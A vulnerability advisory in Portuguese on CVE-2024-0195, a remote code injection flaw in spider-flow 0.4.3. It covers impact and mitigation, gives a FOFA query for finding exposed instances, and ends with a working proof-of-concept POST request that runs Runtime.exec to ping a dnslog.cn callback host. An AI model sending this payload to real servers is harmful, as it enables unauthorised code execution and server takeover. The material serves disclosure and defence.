
CVE-2024-0195 Controle Impróprio da Geração de Código ('Injeção de Código')
CVE-2024-0195 é uma vulnerabilidade crítica de injeção de código na aplicação web spider-flow 0.4.3, especificamente na função FunctionService.saveFunction do arquivo FunctionController.java. Um atacante pode injetar remotamente código malicioso que é executado no servidor. Isso permite o comprometimento completo da aplicação.
Esta vulnerabilidade é extremamente grave, pois permite a execução remota de código no servidor que hospeda a aplicação spider-flow vulnerável. Um atacante poderia comprometer totalmente o servidor, roubar dados sensíveis, instalar malware ou mineradores de criptomoedas e usá-lo para ataques adicionais dentro da rede. A confidencialidade, integridade e disponibilidade da aplicação e do servidor são todas criticamente afetadas.
Uma versão corrigida não é explicitamente mencionada, portanto a correção atualmente não parece ser uma opção. A vulnerabilidade foi divulgada publicamente e existem exploits disponíveis, portanto a mitigação imediata é crítica.
Até que uma correção oficial seja lançada, o spider-flow 0.4.3 deve ser imediatamente colocado offline ou o acesso restrito apenas a redes/usuários confiáveis. Firewalls de aplicação web ou outros controles de validação de entrada podem ser configurados para detectar e bloquear tentativas de ataque de injeção de código como uma mitigação provisória. No entanto, estas não são soluções completas e a versão vulnerável deve ser atualizada assim que uma versão corrigida estiver disponível.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ Prova de conceito
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B